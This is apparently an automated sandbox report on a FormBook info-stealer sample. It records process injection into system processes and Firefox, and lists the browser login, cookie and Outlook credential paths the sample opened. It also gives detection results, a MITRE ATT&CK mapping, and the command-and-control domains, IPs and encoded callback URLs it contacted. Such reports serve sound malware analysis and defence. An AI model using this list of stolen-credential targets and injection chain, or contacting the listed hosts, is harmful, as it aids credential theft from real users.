Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	NtCreateFile: Direct from: 0x77462FEC	Jump to behavior
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	NtOpenFile: Direct from: 0x77462DCC	Jump to behavior
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	NtQueryInformationToken: Direct from: 0x77462CAC	Jump to behavior
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	NtTerminateThread: Direct from: 0x77462FCC	Jump to behavior
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	NtAllocateVirtualMemory: Direct from: 0x77462BEC	Jump to behavior
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	NtOpenKeyEx: Direct from: 0x77462B9C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\mobsync.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: NULL target: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: NULL target: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\mobsync.exe

Thread register set: target process: 6696

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 64C008

Jump to behavior

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe

Code function: 0_2_004987B1 LogonUserW,

0_2_004987B1

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe

Code function: 0_2_00443B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00443B3A

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe

Code function: 0_2_004448D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_004448D7

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe

Code function: 0_2_004A4C53 mouse_event,

0_2_004A4C53

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\AxKxwW9WGa.exe"	Jump to behavior
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	Process created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe

Code function: 0_2_00497CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00497CAF

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe

Code function: 0_2_0049874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_0049874B

Source: AxKxwW9WGa.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: AxKxwW9WGa.exe, TCRjLpECkFbdcm.exe, 00000004.00000002.3334166627.00000000011C1000.00000002.00000001.00040000.00000000.sdmp, TCRjLpECkFbdcm.exe, 00000004.00000000.1659834029.00000000011C0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: TCRjLpECkFbdcm.exe, 00000004.00000002.3334166627.00000000011C1000.00000002.00000001.00040000.00000000.sdmp, TCRjLpECkFbdcm.exe, 00000004.00000000.1659834029.00000000011C0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: TCRjLpECkFbdcm.exe, 00000004.00000002.3334166627.00000000011C1000.00000002.00000001.00040000.00000000.sdmp, TCRjLpECkFbdcm.exe, 00000004.00000000.1659834029.00000000011C0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: 0Program Manager
Source: TCRjLpECkFbdcm.exe, 00000004.00000002.3334166627.00000000011C1000.00000002.00000001.00040000.00000000.sdmp, TCRjLpECkFbdcm.exe, 00000004.00000000.1659834029.00000000011C0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe

Code function: 0_2_0046862B cpuid

0_2_0046862B

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe

Code function: 0_2_00474E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00474E87

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe

Code function: 0_2_00481E06 GetUserNameW,

0_2_00481E06

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe

Code function: 0_2_00473F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00473F3A

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe

Code function: 0_2_004449A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_004449A0

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3334269313.0000000004960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1736577132.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1736053839.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3332853744.0000000002CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1736619988.0000000004E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3334225307.0000000004910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3334427443.0000000003BD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\mobsync.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\mobsync.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: AxKxwW9WGa.exe	Binary or memory string: WIN_81
Source: AxKxwW9WGa.exe	Binary or memory string: WIN_XP
Source: AxKxwW9WGa.exe	Binary or memory string: WIN_XPe
Source: AxKxwW9WGa.exe	Binary or memory string: WIN_VISTA
Source: AxKxwW9WGa.exe	Binary or memory string: WIN_7
Source: AxKxwW9WGa.exe	Binary or memory string: WIN_8
Source: AxKxwW9WGa.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3334269313.0000000004960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1736577132.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1736053839.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3332853744.0000000002CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1736619988.0000000004E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3334225307.0000000004910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3334427443.0000000003BD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_004B6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_004B6283
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_004B6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_004B6747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	5 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	5 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	5 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	151 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	312 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	312 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
AxKxwW9WGa.exe	68%	ReversingLabs	Win32.Trojan.AutoitInject
AxKxwW9WGa.exe	69%	Virustotal		Browse
AxKxwW9WGa.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.laohub10.net/36be/?Ih6=GzF8v0ph3F&T0JX6z9=zT+fCPSXWqCfWPgMnoOydtJKsJuCEtGx9/DVuG0pIlquWt59hgdSk8Rx6eVvndf2YPyLwPhL3z2g/EyQU+U7rC5vzNz0ZFCw8d/R3+K3cKRBUeMTJLe+XGej8HjBlTXN1Q==	0%	Avira URL Cloud	safe
http://www.canadavinreport.site/g3h7/	0%	Avira URL Cloud	safe
http://www.zkdamdjj.shop	0%	Avira URL Cloud	safe
http://www.madhf.tech/0mwe/?Ih6=GzF8v0ph3F&T0JX6z9=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN45JDeb7ji4WvSMSl4p5VjB9j7uxKBUhToKF7GDp/0AaWeg==	0%	Avira URL Cloud	safe
http://www.logidant.xyz/iuvu/	0%	Avira URL Cloud	safe
http://www.zkdamdjj.shop/kf1m/?T0JX6z9=gD/FPiA75bYZCbZDbB+WsVUzjKMJP+r4HqBHW8I3+Q/3qqcwdH4XqO3fnm/yt4rkfBlpHF229jnZH/lk0nBoXOKBKPZyn2cike7Ub3qNJZbDUNl9s1XUkaYGScVYwZ61FA==&Ih6=GzF8v0ph3F	0%	Avira URL Cloud	safe
http://www.aballanet.cat/6xrr/?T0JX6z9=HxJAUmNG5a+243k7lB56qNhkSq7m2edDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBQY2hj09WsNhqz7jh3pjJtHZ6ivVVWaE+CFUoLu/IsL675g==&Ih6=GzF8v0ph3F	100%	Avira URL Cloud	malware
http://www.litespeedtech.com/error-page	0%	Avira URL Cloud	safe
http://www.yunlekeji.top/t322/?Ih6=GzF8v0ph3F&T0JX6z9=FCfXCbowRdQKA3bKzmWhb/MMDIYWCwffvgnpa1jm1l5RPo8GmzCZxrunal2GKioIIi33qnUs85PYplnvRA3XR8V86LXkcIGT0dmKE8rYJBtcLljpCBGaC+nO46fC9uxVPg==	0%	Avira URL Cloud	safe
http://www.logidant.xyz/iuvu/?T0JX6z9=4GSi4NjhieA+eby0NKQzTEPCPA5td1TZNopVgGr+MixqN2kv+x7vZ9YkKN38Qwr7I1LnRiqAhNhB07BIn5yne0LzqH+H8Nzlr/8TCrRqA4T6hsg8YSRhr2x7F+rJ6nzbiw==&Ih6=GzF8v0ph3F	0%	Avira URL Cloud	safe
http://www.zkdamdjj.shop/kf1m/	0%	Avira URL Cloud	safe
http://www.aballanet.cat/6xrr/	100%	Avira URL Cloud	malware
http://www.izmirescortg.xyz/lnl7/?Ih6=GzF8v0ph3F&T0JX6z9=kAPJ1zL1a1XedmcrdtHAbU+8MxIg1b6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgZUCCvIMy+6OdADZldWa3Ro5vmyUj0qJuSG5eCoJgas7XnA==	0%	Avira URL Cloud	safe
http://www.yunlekeji.top/t322/	0%	Avira URL Cloud	safe
http://www.madhf.tech/0mwe/	0%	Avira URL Cloud	safe
http://aballanet.cat/6xrr/?T0JX6z9=HxJAUmNG5a	100%	Avira URL Cloud	malware
http://www.canadavinreport.site/g3h7/?T0JX6z9=dyqW+SkpLS8uL5dRky9k7MKcOglS/8z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BRvMsWNScFLLtPX2xNM4zETNmxHASFhTRGutFERc3E41rkQ==&Ih6=GzF8v0ph3F	0%	Avira URL Cloud	safe
http://www.laohub10.net/36be/	0%	Avira URL Cloud	safe
http://www.canadavinreport.site/g3h7/?T0JX6z9=dyqW	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.izmirescortg.xyz	172.67.186.192	true	false	high
www.madhf.tech	103.224.182.242	true	false	high
fap-a13f5c64.faipod.com	165.154.96.210	true	false	unknown
r0lqcud7.nbnnn.xyz	27.124.4.246	true	false	high
logidant.xyz	45.141.156.114	true	false	high
www.zkdamdjj.shop	188.114.96.3	true	false	high
www.canadavinreport.site	185.27.134.206	true	false	high
aballanet.cat	134.0.14.158	true	true	unknown
www.logidant.xyz	unknown	unknown	false	high
www.laohub10.net	unknown	unknown	false	high
www.aballanet.cat	unknown	unknown	false	unknown
www.yunlekeji.top	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.zkdamdjj.shop/kf1m/?T0JX6z9=gD/FPiA75bYZCbZDbB+WsVUzjKMJP+r4HqBHW8I3+Q/3qqcwdH4XqO3fnm/yt4rkfBlpHF229jnZH/lk0nBoXOKBKPZyn2cike7Ub3qNJZbDUNl9s1XUkaYGScVYwZ61FA==&Ih6=GzF8v0ph3F	false	Avira URL Cloud: safe	unknown
http://www.aballanet.cat/6xrr/?T0JX6z9=HxJAUmNG5a+243k7lB56qNhkSq7m2edDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBQY2hj09WsNhqz7jh3pjJtHZ6ivVVWaE+CFUoLu/IsL675g==&Ih6=GzF8v0ph3F	true	Avira URL Cloud: malware	unknown
http://www.canadavinreport.site/g3h7/	false	Avira URL Cloud: safe	unknown
http://www.laohub10.net/36be/?Ih6=GzF8v0ph3F&T0JX6z9=zT+fCPSXWqCfWPgMnoOydtJKsJuCEtGx9/DVuG0pIlquWt59hgdSk8Rx6eVvndf2YPyLwPhL3z2g/EyQU+U7rC5vzNz0ZFCw8d/R3+K3cKRBUeMTJLe+XGej8HjBlTXN1Q==	false	Avira URL Cloud: safe	unknown
http://www.yunlekeji.top/t322/?Ih6=GzF8v0ph3F&T0JX6z9=FCfXCbowRdQKA3bKzmWhb/MMDIYWCwffvgnpa1jm1l5RPo8GmzCZxrunal2GKioIIi33qnUs85PYplnvRA3XR8V86LXkcIGT0dmKE8rYJBtcLljpCBGaC+nO46fC9uxVPg==	false	Avira URL Cloud: safe	unknown
http://www.madhf.tech/0mwe/?Ih6=GzF8v0ph3F&T0JX6z9=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN45JDeb7ji4WvSMSl4p5VjB9j7uxKBUhToKF7GDp/0AaWeg==	false	Avira URL Cloud: safe	unknown
http://www.logidant.xyz/iuvu/	false	Avira URL Cloud: safe	unknown
http://www.logidant.xyz/iuvu/?T0JX6z9=4GSi4NjhieA+eby0NKQzTEPCPA5td1TZNopVgGr+MixqN2kv+x7vZ9YkKN38Qwr7I1LnRiqAhNhB07BIn5yne0LzqH+H8Nzlr/8TCrRqA4T6hsg8YSRhr2x7F+rJ6nzbiw==&Ih6=GzF8v0ph3F	false	Avira URL Cloud: safe	unknown
http://www.zkdamdjj.shop/kf1m/	false	Avira URL Cloud: safe	unknown
http://www.izmirescortg.xyz/lnl7/?Ih6=GzF8v0ph3F&T0JX6z9=kAPJ1zL1a1XedmcrdtHAbU+8MxIg1b6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgZUCCvIMy+6OdADZldWa3Ro5vmyUj0qJuSG5eCoJgas7XnA==	false	Avira URL Cloud: safe	unknown
http://www.canadavinreport.site/g3h7/?T0JX6z9=dyqW+SkpLS8uL5dRky9k7MKcOglS/8z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BRvMsWNScFLLtPX2xNM4zETNmxHASFhTRGutFERc3E41rkQ==&Ih6=GzF8v0ph3F	false	Avira URL Cloud: safe	unknown
http://www.aballanet.cat/6xrr/	true	Avira URL Cloud: malware	unknown
http://www.laohub10.net/36be/	false	Avira URL Cloud: safe	unknown
http://www.madhf.tech/0mwe/	false	Avira URL Cloud: safe	unknown
http://www.yunlekeji.top/t322/	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	mobsync.exe, 00000005.00000003.1926379644.0000000007DBE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	mobsync.exe, 00000005.00000003.1926379644.0000000007DBE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	mobsync.exe, 00000005.00000003.1926379644.0000000007DBE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.zkdamdjj.shop	TCRjLpECkFbdcm.exe, 00000004.00000002.3339063922.0000000006CA1000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.litespeedtech.com/error-page	TCRjLpECkFbdcm.exe, 00000004.00000002.3337678767.0000000004BD4000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 00000005.00000002.3335326583.0000000005694000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2031668617.0000000006BB4000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	mobsync.exe, 00000005.00000003.1926379644.0000000007DBE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	mobsync.exe, 00000005.00000003.1926379644.0000000007DBE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	mobsync.exe, 00000005.00000003.1926379644.0000000007DBE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	mobsync.exe, 00000005.00000003.1926379644.0000000007DBE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://aballanet.cat/6xrr/?T0JX6z9=HxJAUmNG5a	TCRjLpECkFbdcm.exe, 00000004.00000002.3337678767.0000000004D66000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 00000005.00000002.3335326583.0000000005826000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	mobsync.exe, 00000005.00000003.1926379644.0000000007DBE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.canadavinreport.site/g3h7/?T0JX6z9=dyqW	mobsync.exe, 00000005.00000002.3336943612.0000000007B10000.00000004.00000800.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3335326583.0000000005B4A000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	mobsync.exe, 00000005.00000003.1926379644.0000000007DBE000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
45.141.156.114	logidant.xyz	Germany	30860	YURTEH-ASUA	false
165.154.96.210	fap-a13f5c64.faipod.com	Canada	7456	INTERHOPCA	false
27.124.4.246	r0lqcud7.nbnnn.xyz	Singapore	64050	BCPL-SGBGPNETGlobalASNSG	false
188.114.96.3	www.zkdamdjj.shop	European Union	13335	CLOUDFLARENETUS	false
103.224.182.242	www.madhf.tech	Australia	133618	TRELLIAN-AS-APTrellianPtyLimitedAU	false
185.27.134.206	www.canadavinreport.site	United Kingdom	34119	WILDCARD-ASWildcardUKLimitedGB	false
172.67.186.192	www.izmirescortg.xyz	United States	13335	CLOUDFLARENETUS	false
134.0.14.158	aballanet.cat	Spain	197712	CDMONsistemescdmoncomES	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588581
Start date and time:	2025-01-11 02:48:30 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	AxKxwW9WGa.exe renamed because original name is a hash value
Original Sample Name:	0de849d3feff2b2fb9e28111e801534621851cf1bd0f01e1e18d28e07ca3ab32.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/3@9/8
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 97% Number of executed functions: 50 Number of non-executed functions: 274
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
